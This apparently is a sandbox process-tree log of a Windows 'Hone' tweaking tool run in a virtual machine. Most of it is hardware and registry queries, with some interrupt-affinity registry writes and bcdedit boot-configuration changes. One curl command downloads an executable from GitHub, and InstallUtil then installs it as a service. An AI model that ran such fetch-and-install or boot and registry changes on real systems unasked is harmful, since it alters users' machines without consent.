C:\Windows\system32\find.exefind "0x400"6⤵PID:4592
-
-
C:\Windows\system32\sc.exesc query STR6⤵
- Launches sc.exe
PID:4568
-
-
C:\Windows\system32\find.exefind "RUNNING"6⤵PID:1112
-
-
C:\Windows\system32\sc.exesc query HoneAudio6⤵
- Launches sc.exe
PID:3340
-
-
C:\Windows\system32\find.exefind "RUNNING"6⤵PID:1200
-
-
C:\Windows\System32\Wbem\WMIC.exewmic path Win32_Battery Get BatteryStatus6⤵PID:4136
-
-
C:\Windows\system32\find.exefind "1"6⤵PID:1572
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c wmic path Win32_VideoController get VideoProcessor /value6⤵PID:4904
-
C:\Windows\System32\Wbem\WMIC.exewmic path Win32_VideoController get VideoProcessor /value7⤵PID:3996
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" echo SeaBIOS VBE(C) 2011 "6⤵PID:976
-
-
C:\Windows\system32\find.exefind "GeForce"6⤵PID:3404
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" echo SeaBIOS VBE(C) 2011 "6⤵PID:2392
-
-
C:\Windows\system32\find.exefind "NVIDIA"6⤵PID:392
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" echo SeaBIOS VBE(C) 2011 "6⤵PID:788
-
-
C:\Windows\system32\find.exefind "RTX"6⤵PID:2096
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" echo SeaBIOS VBE(C) 2011 "6⤵PID:4596
-
-
C:\Windows\system32\find.exefind "GTX"6⤵PID:3300
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" echo SeaBIOS VBE(C) 2011 "6⤵PID:4960
-
-
C:\Windows\system32\find.exefind "AMD"6⤵PID:4644
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" echo SeaBIOS VBE(C) 2011 "6⤵PID:3376
-
-
C:\Windows\system32\find.exefind "Ryzen"6⤵PID:2620
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" echo SeaBIOS VBE(C) 2011 "6⤵PID:2652
-
-
C:\Windows\system32\find.exefind "Intel"6⤵PID:4936
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" echo SeaBIOS VBE(C) 2011 "6⤵PID:1732
-
-
C:\Windows\system32\find.exefind "UHD"6⤵PID:4308
-
-
C:\Windows\system32\sc.exesc config "STR" start= auto6⤵
- Launches sc.exe
PID:4516
-
-
C:\Windows\system32\net.exenet start STR6⤵PID:2552
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 start STR7⤵PID:1384
-
-
-
C:\Windows\system32\curl.execurl -g -L -# -o "C:\Hone\Resources\SetTimerResolutionService.exe" "https://github.com/auraside/HoneCtrl/raw/main/Files/SetTimerResolutionService.exe"6⤵PID:1212
-
-
C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeC:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe /i SetTimerResolutionService.exe6⤵
- System Location Discovery: System Language Discovery
PID:2640
-
-
C:\Windows\system32\sc.exesc config "STR" start=auto6⤵
- Launches sc.exe
PID:1816
-
-
C:\Windows\system32\net.exenet start STR6⤵PID:5092
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 start STR7⤵PID:1564
-
-
-
C:\Windows\system32\bcdedit.exebcdedit /set disabledynamictick yes6⤵
- Modifies boot configuration data using bcdedit
PID:1132
-
-
C:\Windows\system32\bcdedit.exebcdedit /deletevalue useplatformclock6⤵
- Modifies boot configuration data using bcdedit
PID:3040
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c wmic OS get buildnumber /value6⤵PID:3380
-
C:\Windows\System32\Wbem\WMIC.exewmic OS get buildnumber /value7⤵PID:4464
-
-
-
C:\Windows\system32\bcdedit.exebcdedit /deletevalue useplatformtick6⤵
- Modifies boot configuration data using bcdedit
PID:1096
-
-
C:\Windows\system32\mode.comMode 130,456⤵PID:2984
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c wmic path win32_VideoController get PNPDeviceID | findstr /L "VEN_"6⤵PID:3984
-
C:\Windows\System32\Wbem\WMIC.exewmic path win32_VideoController get PNPDeviceID7⤵PID:2140
-
-
C:\Windows\system32\findstr.exefindstr /L "VEN_"7⤵PID:4948
-
-
-
C:\Windows\system32\reg.exereg query "HKLM\SYSTEM\CurrentControlSet\Enum\PCI\VEN_1234&DEV_1111&SUBSYS_11001AF4&REV_02\3&11583659&0&08\Device Parameters\Interrupt Management\MessageSignaledInterruptProperties" /v "MSISupported"6⤵PID:2204
-
-
C:\Windows\system32\find.exefind "0x1"6⤵PID:4252
-
-
C:\Windows\system32\reg.exereg query "HKLM\System\CurrentControlSet\Enum\PCI\VEN_1234&DEV_1111&SUBSYS_11001AF4&REV_02\3&11583659&0&08\Device Parameters\Interrupt Management\Affinity Policy" /v "DevicePriority"6⤵PID:4220
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c wmic path Win32_NetworkAdapter get PNPDeviceID | findstr /L "VEN_"6⤵PID:3272
-
C:\Windows\System32\Wbem\WMIC.exewmic path Win32_NetworkAdapter get PNPDeviceID7⤵PID:476
-
-
C:\Windows\system32\findstr.exefindstr /L "VEN_"7⤵PID:3248
-
-
-
C:\Windows\system32\reg.exereg query "HKLM\SYSTEM\CurrentControlSet\Enum\PCI\VEN_10EC&DEV_8139&SUBSYS_11001AF4&REV_20\3&11583659&0&18\Device Parameters\Interrupt Management\MessageSignaledInterruptProperties" /v "MSISupported"6⤵PID:3012
-
-
C:\Windows\system32\find.exefind "0x1"6⤵PID:320
-
-
C:\Windows\system32\reg.exereg query "HKLM\System\CurrentControlSet\Enum\PCI\VEN_10EC&DEV_8139&SUBSYS_11001AF4&REV_20\3&11583659&0&18\Device Parameters\Interrupt Management\Affinity Policy" /v "DevicePriority"6⤵PID:3884
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c wmic os get TotalVisibleMemorySize /value6⤵PID:4396
-
C:\Windows\System32\Wbem\WMIC.exewmic os get TotalVisibleMemorySize /value7⤵PID:2348
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c reg query "HKLM\SYSTEM\CurrentControlSet\Control" /v "SvcHostSplitThresholdInKB"6⤵PID:3516
-
C:\Windows\system32\reg.exereg query "HKLM\SYSTEM\CurrentControlSet\Control" /v "SvcHostSplitThresholdInKB"7⤵PID:1644
-
-
-
C:\Windows\system32\reg.exereg query "HKCU\Software\Hone" /v "NVTTweaks"6⤵PID:3476
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c reg query "HKLM\System\CurrentControlSet\Control\Class\{4d36e968-e325-11ce-bfc1-08002be10318}" /t REG_SZ /s /e /f "NVIDIA" | findstr "HKEY"6⤵PID:5060
-
C:\Windows\system32\reg.exereg query "HKLM\System\CurrentControlSet\Control\Class\{4d36e968-e325-11ce-bfc1-08002be10318}" /t REG_SZ /s /e /f "NVIDIA"7⤵PID:1432
-
-
C:\Windows\system32\findstr.exefindstr "HKEY"7⤵PID:2156
-
-
-
C:\Windows\system32\reg.exereg query "HKLM\SYSTEM\CurrentControlSet\Services\nvlddmkm" /v "DisablePreemption"6⤵PID:4412
-
-
C:\Windows\system32\find.exefind "0x1"6⤵PID:2656
-
-
C:\Windows\system32\reg.exereg query "HKLM\SYSTEM\CurrentControlSet\Services\nvlddmkm" /v "DisableCudaContextPreemption"6⤵PID:2968
-
-
C:\Windows\system32\find.exefind "0x1"6⤵PID:4020
-
-
C:\Windows\system32\reg.exereg query "HKLM\SYSTEM\CurrentControlSet\Services\nvlddmkm" /v "EnableCEPreemption"6⤵PID:1296
-
-
C:\Windows\system32\find.exefind "0x0"6⤵PID:4452
-
-
C:\Windows\system32\reg.exereg query "HKLM\SYSTEM\CurrentControlSet\Services\nvlddmkm" /v "DisablePreemptionOnS3S4"6⤵PID:5084
-
-
C:\Windows\system32\find.exefind "0x1"6⤵PID:232
-
-
C:\Windows\system32\reg.exereg query "HKLM\SYSTEM\CurrentControlSet\Services\nvlddmkm" /v "ComputePreemption"6⤵PID:4104
-
-
C:\Windows\system32\find.exefind "0x0"6⤵PID:672
-
-
C:\Windows\system32\reg.exereg query "HKLM\Software\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\csrss.exe\PerfOptions" /v CpuPriorityClass6⤵PID:1220
-
-
C:\Windows\system32\find.exefind "0x4"6⤵PID:4736
-
-
C:\Windows\system32\reg.exereg query "HKLM\Software\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\csrss.exe\PerfOptions" /v IoPriority6⤵PID:3864
-
-
C:\Windows\system32\find.exefind "0x3"6⤵PID:3560
-
-
C:\Windows\system32\powercfg.exepowercfg /GetActiveScheme6⤵
- Power Settings
PID:4876
-
-
C:\Windows\system32\find.exefind "Hone"6⤵PID:4540
-
-
C:\Windows\system32\reg.exereg query "HKCU\Software\Hone" /v "AllGPUTweaks"6⤵PID:5112
-
-
C:\Windows\system32\reg.exereg query "HKCU\Software\Hone" /v "NpiTweaks"6⤵PID:2364
-
-
C:\Windows\system32\reg.exereg query "HKCU\Software\Hone" /v "TCPIP"6⤵PID:4968
-
-
C:\Windows\system32\reg.exereg query "HKCU\Software\Hone" /v "NvidiaTweaks"6⤵PID:2052
-
-
C:\Windows\system32\reg.exereg query "HKCU\Software\Hone" /v "MemoryTweaks"6⤵PID:4752
-
-
C:\Windows\system32\reg.exereg query "HKCU\Software\Hone" /v "InternetTweaks"6⤵PID:2592
-
-
C:\Windows\system32\reg.exereg query "HKCU\Software\Hone" /v "ServicesTweaks"6⤵PID:1292
-
-
C:\Windows\system32\reg.exereg query "HKCU\Software\Hone" /v "DebloatTweaks"6⤵PID:4592
-
-
C:\Windows\system32\reg.exereg query "HKCU\Software\Hone" /v "MitigationsTweaks"6⤵PID:3252
-
-
C:\Windows\system32\reg.exereg query "HKCU\Software\Hone" /v "AffinityTweaks"6⤵PID:1112
-
-
C:\Windows\system32\reg.exereg query "HKLM\SYSTEM\CurrentControlSet\Services\nvlddmkm" /v "DisableWriteCombining"6⤵PID:1996
-
-
C:\Windows\system32\reg.exereg query "HKCU\Control Panel\Mouse" /v "SmoothMouseYCurve"6⤵PID:1200
-
-
C:\Windows\system32\find.exefind "0000000000000000000038000000000000007000000000000000A800000000000000E00000000000"6⤵PID:1364
-
-
C:\Windows\system32\reg.exereg query "HKLM\SOFTWARE\Intel\GMM" /v "DedicatedSegmentSize"6⤵PID:1760
-
-
C:\Windows\system32\find.exefind "0x400"6⤵PID:4136
-
-
C:\Windows\system32\sc.exesc query STR6⤵
- Launches sc.exe
PID:2376
-
-
C:\Windows\system32\find.exefind "RUNNING"6⤵PID:456
-
-
C:\Windows\system32\sc.exesc query HoneAudio6⤵
- Launches sc.exe
PID:1824
-
-
C:\Windows\system32\find.exefind "RUNNING"6⤵PID:2872
-
-
C:\Windows\System32\Wbem\WMIC.exewmic path Win32_Battery Get BatteryStatus6⤵PID:848
-
-
C:\Windows\system32\find.exefind "1"6⤵PID:1324
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c wmic path Win32_VideoController get VideoProcessor /value6⤵PID:524
-
C:\Windows\System32\Wbem\WMIC.exewmic path Win32_VideoController get VideoProcessor /value7⤵PID:4064
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" echo SeaBIOS VBE(C) 2011 "6⤵PID:788
-
-
C:\Windows\system32\find.exefind "GeForce"6⤵PID:4560
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" echo SeaBIOS VBE(C) 2011 "6⤵PID:4596
-
-
C:\Windows\system32\find.exefind "NVIDIA"6⤵PID:4384
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" echo SeaBIOS VBE(C) 2011 "6⤵PID:4960
-
-
C:\Windows\system32\find.exefind "RTX"6⤵PID:2372
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" echo SeaBIOS VBE(C) 2011 "6⤵PID:3376
-
-
C:\Windows\system32\find.exefind "GTX"6⤵PID:2528
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" echo SeaBIOS VBE(C) 2011 "6⤵PID:2652
-
-
C:\Windows\system32\find.exefind "AMD"6⤵PID:2568
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" echo SeaBIOS VBE(C) 2011 "6⤵PID:3820
-
-
C:\Windows\system32\find.exefind "Ryzen"6⤵PID:2112
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" echo SeaBIOS VBE(C) 2011 "6⤵PID:4068
-
-
C:\Windows\system32\find.exefind "Intel"6⤵PID:4100
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" echo SeaBIOS VBE(C) 2011 "6⤵PID:1144
-
-
C:\Windows\system32\find.exefind "UHD"6⤵PID:2552
-
-
C:\Windows\system32\reg.exereg add "HKCU\Software\Hone" /v AffinityTweaks /f6⤵PID:4624
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c wmic cpu get NumberOfCores /value | find "="6⤵PID:3016
-
C:\Windows\System32\Wbem\WMIC.exewmic cpu get NumberOfCores /value7⤵PID:2088
-
-
C:\Windows\system32\find.exefind "="7⤵PID:3208
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c wmic cpu get NumberOfLogicalProcessors /value | find "="6⤵PID:2964
-
C:\Windows\System32\Wbem\WMIC.exewmic cpu get NumberOfLogicalProcessors /value7⤵PID:4556
-
-
C:\Windows\system32\find.exefind "="7⤵PID:3304
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c wmic path Win32_USBController get PNPDeviceID| findstr /l "PCI\VEN_"6⤵PID:3964
-
C:\Windows\System32\Wbem\WMIC.exewmic path Win32_USBController get PNPDeviceID7⤵PID:2640
-
-
C:\Windows\system32\findstr.exefindstr /l "PCI\VEN_"7⤵PID:1360
-
-
-
C:\Windows\system32\reg.exereg add "HKLM\System\CurrentControlSet\Enum\PCI\VEN_8086&DEV_24CD&SUBSYS_11001AF4&REV_10\3&11583659&0&20\Device Parameters\Interrupt Management\Affinity Policy" /v "DevicePolicy" /t REG_DWORD /d "4" /f6⤵PID:1132
-
-
C:\Windows\system32\reg.exereg add "HKLM\System\CurrentControlSet\Enum\PCI\VEN_8086&DEV_24CD&SUBSYS_11001AF4&REV_10\3&11583659&0&20\Device Parameters\Interrupt Management\Affinity Policy" /v "AssignmentSetOverride" /t REG_BINARY /d "08" /f6⤵PID:4332
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c wmic path Win32_VideoController get PNPDeviceID| findstr /l "PCI\VEN_"6⤵PID:3688
-
C:\Windows\System32\Wbem\WMIC.exewmic path Win32_VideoController get PNPDeviceID7⤵PID:2584
-
-
C:\Windows\system32\findstr.exefindstr /l "PCI\VEN_"7⤵PID:4676
-
-
-
C:\Windows\system32\reg.exereg add "HKLM\System\CurrentControlSet\Enum\PCI\VEN_1234&DEV_1111&SUBSYS_11001AF4&REV_02\3&11583659&0&08\Device Parameters\Interrupt Management\Affinity Policy" /v "DevicePolicy" /t REG_DWORD /d "4" /f6⤵PID:2984
-
-
C:\Windows\system32\reg.exereg add "HKLM\System\CurrentControlSet\Enum\PCI\VEN_1234&DEV_1111&SUBSYS_11001AF4&REV_02\3&11583659&0&08\Device Parameters\Interrupt Management\Affinity Policy" /v "AssignmentSetOverride" /t REG_BINARY /d "02" /f6⤵PID:1044
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c wmic path Win32_NetworkAdapter get PNPDeviceID| findstr /l "PCI\VEN_"6⤵PID:2952
-
C:\Windows\System32\Wbem\WMIC.exewmic path Win32_NetworkAdapter get PNPDeviceID7⤵PID:2224
-
-
C:\Windows\system32\findstr.exefindstr /l "PCI\VEN_"7⤵PID:224
-
-
-
C:\Windows\system32\reg.exereg add "HKLM\System\CurrentControlSet\Enum\PCI\VEN_10EC&DEV_8139&SUBSYS_11001AF4&REV_20\3&11583659&0&18\Device Parameters\Interrupt Management\Affinity Policy" /v "DevicePolicy" /t REG_DWORD /d "4" /f6⤵PID:992
-
-
C:\Windows\system32\reg.exereg add "HKLM\System\CurrentControlSet\Enum\PCI\VEN_10EC&DEV_8139&SUBSYS_11001AF4&REV_20\3&11583659&0&18\Device Parameters\Interrupt Management\Affinity Policy" /v "AssignmentSetOverride" /t REG_BINARY /d "04" /f6⤵PID:1116
-
-
C:\Windows\system32\mode.comMode 130,456⤵PID:1108
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c wmic path win32_VideoController get PNPDeviceID | findstr /L "VEN_"6⤵PID:4224
-
C:\Windows\System32\Wbem\WMIC.exewmic path win32_VideoController get PNPDeviceID7⤵PID:560
-
-
C:\Windows\system32\findstr.exefindstr /L "VEN_"7⤵PID:2624
-
-
-
C:\Windows\system32\reg.exereg query "HKLM\SYSTEM\CurrentControlSet\Enum\PCI\VEN_1234&DEV_1111&SUBSYS_11001AF4&REV_02\3&11583659&0&08\Device Parameters\Interrupt Management\MessageSignaledInterruptProperties" /v "MSISupported"6⤵PID:4580
-
-
C:\Windows\system32\find.exefind "0x1"6⤵PID:320
-
-
C:\Windows\system32\reg.exereg query "HKLM\System\CurrentControlSet\Enum\PCI\VEN_1234&DEV_1111&SUBSYS_11001AF4&REV_02\3&11583659&0&08\Device Parameters\Interrupt Management\Affinity Policy" /v "DevicePriority"6⤵PID:460
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c wmic path Win32_NetworkAdapter get PNPDeviceID | findstr /L "VEN_"6⤵PID:2344
-
C:\Windows\System32\Wbem\WMIC.exewmic path Win32_NetworkAdapter get PNPDeviceID7⤵PID:2348
-
-
C:\Windows\system32\findstr.exefindstr /L "VEN_"7⤵PID:4396
-
-
-
C:\Windows\system32\reg.exereg query "HKLM\SYSTEM\CurrentControlSet\Enum\PCI\VEN_10EC&DEV_8139&SUBSYS_11001AF4&REV_20\3&11583659&0&18\Device Parameters\Interrupt Management\MessageSignaledInterruptProperties" /v "MSISupported"6⤵PID:3476
-
-
C:\Windows\system32\find.exefind "0x1"6⤵PID:3788
-
-
C:\Windows\system32\reg.exereg query "HKLM\System\CurrentControlSet\Enum\PCI\VEN_10EC&DEV_8139&SUBSYS_11001AF4&REV_20\3&11583659&0&18\Device Parameters\Interrupt Management\Affinity Policy" /v "DevicePriority"6⤵PID:2156
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c wmic os get TotalVisibleMemorySize /value6⤵PID:5060
-
C:\Windows\System32\Wbem\WMIC.exewmic os get TotalVisibleMemorySize /value7⤵PID:4412
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c reg query "HKLM\SYSTEM\CurrentControlSet\Control" /v "SvcHostSplitThresholdInKB"6⤵PID:2968
-
C:\Windows\system32\reg.exereg query "HKLM\SYSTEM\CurrentControlSet\Control" /v "SvcHostSplitThresholdInKB"7⤵PID:4020
-
-
-
C:\Windows\system32\reg.exereg query "HKCU\Software\Hone" /v "NVTTweaks"6⤵PID:1296
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c reg query "HKLM\System\CurrentControlSet\Control\Class\{4d36e968-e325-11ce-bfc1-08002be10318}" /t REG_SZ /s /e /f "NVIDIA" | findstr "HKEY"6⤵PID:3660
-
C:\Windows\system32\reg.exereg query "HKLM\System\CurrentControlSet\Control\Class\{4d36e968-e325-11ce-bfc1-08002be10318}" /t REG_SZ /s /e /f "NVIDIA"7⤵PID:5084
-
-
C:\Windows\system32\findstr.exefindstr "HKEY"7⤵PID:4376
-
-
-
C:\Windows\system32\reg.exereg query "HKLM\SYSTEM\CurrentControlSet\Services\nvlddmkm" /v "DisablePreemption"6⤵PID:4104
-
-
C:\Windows\system32\find.exefind "0x1"6⤵PID:2800
-
-
C:\Windows\system32\reg.exereg query "HKLM\SYSTEM\CurrentControlSet\Services\nvlddmkm" /v "DisableCudaContextPreemption"6⤵PID:1220
-
-
C:\Windows\system32\find.exefind "0x1"6⤵PID:3080
-
-
C:\Windows\system32\reg.exereg query "HKLM\SYSTEM\CurrentControlSet\Services\nvlddmkm" /v "EnableCEPreemption"6⤵PID:3864
-
-
C:\Windows\system32\find.exefind "0x0"6⤵PID:4572
-
-
C:\Windows\system32\reg.exereg query "HKLM\SYSTEM\CurrentControlSet\Services\nvlddmkm" /v "DisablePreemptionOnS3S4"6⤵PID:4876
-
-
C:\Windows\system32\find.exefind "0x1"6⤵PID:2548
-
-
C:\Windows\system32\reg.exereg query "HKLM\SYSTEM\CurrentControlSet\Services\nvlddmkm" /v "ComputePreemption"6⤵PID:3792
-
-
C:\Windows\system32\find.exefind "0x0"6⤵PID:3264
-
-
C:\Windows\system32\reg.exereg query "HKLM\Software\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\csrss.exe\PerfOptions" /v CpuPriorityClass6⤵PID:4468
-
-
C:\Windows\system32\find.exefind "0x4"6⤵PID:1396
-
-
C:\Windows\system32\reg.exereg query "HKLM\Software\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\csrss.exe\PerfOptions" /v IoPriority6⤵PID:3860
-
-
C:\Windows\system32\find.exefind "0x3"6⤵PID:520
-
-
C:\Windows\system32\powercfg.exepowercfg /GetActiveScheme6⤵
- Power Settings
PID:4712
-
-
C:\Windows\system32\find.exefind "Hone"6⤵PID:3344
-
-
C:\Windows\system32\reg.exereg query "HKCU\Software\Hone" /v "AllGPUTweaks"6⤵PID:4828
-
-
C:\Windows\system32\reg.exereg query "HKCU\Software\Hone" /v "NpiTweaks"6⤵PID:2820
-
-
C:\Windows\system32\reg.exereg query "HKCU\Software\Hone" /v "TCPIP"6⤵PID:1676
-
-
C:\Windows\system32\reg.exereg query "HKCU\Software\Hone" /v "NvidiaTweaks"6⤵PID:1200
-
-
C:\Windows\system32\reg.exereg query "HKCU\Software\Hone" /v "MemoryTweaks"6⤵PID:2600
-
-
C:\Windows\system32\reg.exereg query "HKCU\Software\Hone" /v "InternetTweaks"6⤵PID:1900
-
-
C:\Windows\system32\reg.exereg query "HKCU\Software\Hone" /v "ServicesTweaks"6⤵PID:4284
-
-
C:\Windows\system32\reg.exereg query "HKCU\Software\Hone" /v "DebloatTweaks"6⤵PID:4444
-
-
C:\Windows\system32\reg.exereg query "HKCU\Software\Hone" /v "MitigationsTweaks"6⤵PID:3332
-
-
C:\Windows\system32\reg.exereg query "HKCU\Software\Hone" /v "AffinityTweaks"6⤵PID:1824
-
-
C:\Windows\system32\reg.exereg query "HKLM\SYSTEM\CurrentControlSet\Services\nvlddmkm" /v "DisableWriteCombining"6⤵PID:1736
-
-
C:\Windows\system32\reg.exereg query "HKCU\Control Panel\Mouse" /v "SmoothMouseYCurve"6⤵PID:4988
-
-
C:\Windows\system32\find.exefind "0000000000000000000038000000000000007000000000000000A800000000000000E00000000000"6⤵PID:1720
-
-
C:\Windows\system32\reg.exereg query "HKLM\SOFTWARE\Intel\GMM" /v "DedicatedSegmentSize"6⤵PID:1976
-
-
C:\Windows\system32\find.exefind "0x400"6⤵PID:4024
-
-
C:\Windows\system32\sc.exesc query STR6⤵
- Launches sc.exe
PID:3180
-
-
C:\Windows\system32\find.exefind "RUNNING"6⤵PID:3404
-
-
C:\Windows\system32\sc.exesc query HoneAudio6⤵
- Launches sc.exe
PID:788
-
-
C:\Windows\system32\find.exefind "RUNNING"6⤵PID:3892
-
-
C:\Windows\System32\Wbem\WMIC.exewmic path Win32_Battery Get BatteryStatus6⤵PID:1376
-
-
C:\Windows\system32\find.exefind "1"6⤵PID:4596
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c wmic path Win32_VideoController get VideoProcessor /value6⤵PID:2372
-
C:\Windows\System32\Wbem\WMIC.exewmic path Win32_VideoController get VideoProcessor /value7⤵PID:2620
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" echo SeaBIOS VBE(C) 2011 "6⤵PID:1180
-
-
C:\Windows\system32\find.exefind "GeForce"6⤵PID:1732
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" echo SeaBIOS VBE(C) 2011 "6⤵PID:4308
-
-
C:\Windows\system32\find.exefind "NVIDIA"6⤵PID:1156
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" echo SeaBIOS VBE(C) 2011 "6⤵PID:1576
-
-
C:\Windows\system32\find.exefind "RTX"6⤵PID:5076
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" echo SeaBIOS VBE(C) 2011 "6⤵PID:3416
-
-
C:\Windows\system32\find.exefind "GTX"6⤵PID:1540
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" echo SeaBIOS VBE(C) 2011 "6⤵PID:4472
-
-
C:\Windows\system32\find.exefind "AMD"6⤵PID:3360
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" echo SeaBIOS VBE(C) 2011 "6⤵PID:1208
-
-
C:\Windows\system32\find.exefind "Ryzen"6⤵PID:756
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" echo SeaBIOS VBE(C) 2011 "6⤵PID:2088
-
-
C:\Windows\system32\find.exefind "Intel"6⤵PID:3328
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" echo SeaBIOS VBE(C) 2011 "6⤵PID:3796
-
-
C:\Windows\system32\find.exefind "UHD"6⤵PID:4432
-
-
C:\Windows\system32\sc.exesc config "STR" start= auto6⤵
- Launches sc.exe
PID:4820
-
-
C:\Windows\system32\net.exenet start STR6⤵PID:1508
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 start STR7⤵PID:2640
-
-
-
C:\Windows\system32\sc.exesc config "STR" start=auto6⤵
- Launches sc.exe
PID:2232
-
-
C:\Windows\system32\net.exenet start STR6⤵PID:3388
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 start STR7⤵PID:3636
-
-
-
C:\Windows\system32\bcdedit.exebcdedit /set disabledynamictick yes6⤵
- Modifies boot configuration data using bcdedit
PID:8
-
-
C:\Windows\system32\bcdedit.exebcdedit /deletevalue useplatformclock6⤵
- Modifies boot configuration data using bcdedit
PID:4868
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c wmic OS get buildnumber /value6⤵PID:3380
-
C:\Windows\System32\Wbem\WMIC.exewmic OS get buildnumber /value7⤵PID:820
-
-
-
C:\Windows\system32\bcdedit.exebcdedit /deletevalue useplatformtick6⤵
- Modifies boot configuration data using bcdedit
PID:2984
-
-
C:\Windows\system32\mode.comMode 130,456⤵PID:1044
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c wmic path win32_VideoController get PNPDeviceID | findstr /L "VEN_"6⤵PID:2296
-
C:\Windows\System32\Wbem\WMIC.exewmic path win32_VideoController get PNPDeviceID7⤵PID:1168
-
-
C:\Windows\system32\findstr.exefindstr /L "VEN_"7⤵PID:2224
-
-
-
C:\Windows\system32\reg.exereg query "HKLM\SYSTEM\CurrentControlSet\Enum\PCI\VEN_1234&DEV_1111&SUBSYS_11001AF4&REV_02\3&11583659&0&08\Device Parameters\Interrupt Management\MessageSignaledInterruptProperties" /v "MSISupported"6⤵PID:3040
-
-
C:\Windows\system32\find.exefind "0x1"6⤵PID:1116
-
-
C:\Windows\system32\reg.exereg query "HKLM\System\CurrentControlSet\Enum\PCI\VEN_1234&DEV_1111&SUBSYS_11001AF4&REV_02\3&11583659&0&08\Device Parameters\Interrupt Management\Affinity Policy" /v "DevicePriority"6⤵PID:1788
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c wmic path Win32_NetworkAdapter get PNPDeviceID | findstr /L "VEN_"6⤵PID:1548
-
C:\Windows\System32\Wbem\WMIC.exewmic path Win32_NetworkAdapter get PNPDeviceID7⤵PID:2160
-
-
C:\Windows\system32\findstr.exefindstr /L "VEN_"7⤵PID:476
-
-
-
C:\Windows\system32\reg.exereg query "HKLM\SYSTEM\CurrentControlSet\Enum\PCI\VEN_10EC&DEV_8139&SUBSYS_11001AF4&REV_20\3&11583659&0&18\Device Parameters\Interrupt Management\MessageSignaledInterruptProperties" /v "MSISupported"6⤵PID:320
-
-
C:\Windows\system32\find.exefind "0x1"6⤵PID:216
-
-
C:\Windows\system32\reg.exereg query "HKLM\System\CurrentControlSet\Enum\PCI\VEN_10EC&DEV_8139&SUBSYS_11001AF4&REV_20\3&11583659&0&18\Device Parameters\Interrupt Management\Affinity Policy" /v "DevicePriority"6⤵PID:4700
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c wmic os get TotalVisibleMemorySize /value6⤵PID:1204
-
C:\Windows\System32\Wbem\WMIC.exewmic os get TotalVisibleMemorySize /value7⤵PID:4648
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c reg query "HKLM\SYSTEM\CurrentControlSet\Control" /v "SvcHostSplitThresholdInKB"6⤵PID:3476
-
C:\Windows\system32\reg.exereg query "HKLM\SYSTEM\CurrentControlSet\Control" /v "SvcHostSplitThresholdInKB"7⤵PID:3788
-
-
-
